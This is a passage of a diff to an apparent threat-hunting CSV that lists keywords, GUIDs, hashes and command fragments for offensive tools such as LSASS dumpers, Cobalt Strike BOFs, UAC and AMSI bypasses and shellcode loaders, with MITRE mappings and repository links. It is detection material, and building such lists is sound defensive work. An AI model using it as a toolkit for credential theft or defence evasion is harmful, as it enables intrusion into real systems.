Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*dumpert_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Dumpert-Aggressor*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert-Aggressor*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpertdll*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*Dumpert-DLL*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*-DumpForest *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*dumplsass*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*dumpntlm.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*DumpNTLMInfo.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*DumpProcessByName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" -"*DumpShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*DumpShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*DumpShellcode.exe*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*DumpShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*DumpSMSAPassword*","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","AD Enumeration","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*DumpShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*DumpSMSAPassword*","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","AD Enumeration","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*dumpVaultCredentials.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*dumpXor.exe *","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" -"*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*E11DC25D-E96D-495D-8968-1BA09C95B673*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","0","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" "*e1cd2b55-3b4f-41bd-a168-40db41e34349*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" -"*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*E54195F0-060C-4B24-98F2-AD9FB5351045*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*E82BCAD1-0D2B-4E95-B382-933CF78A8128*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*E991E6A7-31EA-42E3-A471-90F0090E3AFD*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*E82BCAD1-0D2B-4E95-B382-933CF78A8128*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*E991E6A7-31EA-42E3-A471-90F0090E3AFD*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*","offensive_tool_keyword","UACME","Defeating 